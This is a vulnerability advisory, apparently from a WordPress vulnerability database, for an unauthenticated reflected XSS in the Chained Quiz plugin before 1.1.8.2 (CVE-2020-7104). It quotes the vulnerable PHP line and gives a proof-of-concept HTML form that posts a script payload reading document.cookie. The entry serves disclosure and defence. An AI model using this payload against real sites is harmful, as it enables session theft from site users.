Chained Quiz < 1.1.8.2 - Unauthenticated Reflected XSS



Description
WordPress Plugin Plugin Chained Quiz before 1.1.8.2 suffers from a Reflected XSS vulnerability in the 'total_questions' POST parameter when a user completes a quiz. 

The code in question accepts the 'total_questions' parameter without escaping the special characters:

models/quiz.php

$output = str_replace('{{questions}}', $_POST['total_questions'], $output);
Proof of Concept
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="answer" value="x&#32;" />
      <input type="hidden" name="question&#95;id" value="1" />
      <input type="hidden" name="quiz&#95;id" value="1" />
      <input type="hidden" name="post&#95;id"a value="5" />
      <input type="hidden" name="question&#95;type" value="radio" />
      <input type="hidden" name="points" value="0" />
      <input type="hidden" name="action" value="chainedquiz&#95;ajax" />
      <input type="hidden" name="chainedquiz&#95;action" value="answer" />
      <input type="hidden" name="total&#95;questions" value="1v4918&lt;script&gt;alert&#40;document&#46;cookie&#41;&lt;&#47;script&gt;eyjfw" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugin

fixed in version 1.1.8.2

References

CVE 2020-7104
URL https://plugins.trac.wordpress.org/changeset/2228538
URL https://spider-security.co.uk/blog-cve-2020-7104

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Ben Armstrong
Submitter Ben Armstrong
Submitter Website https://spider-security.co.uk
Views 3497
Verified No
WPVDB ID 10029

Timeline

Publicly Published 2020-01-16 (about 1 month ago)
Added 2020-01-16 (about 1 month ago)
Last Updated 2020-01-23 (28 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin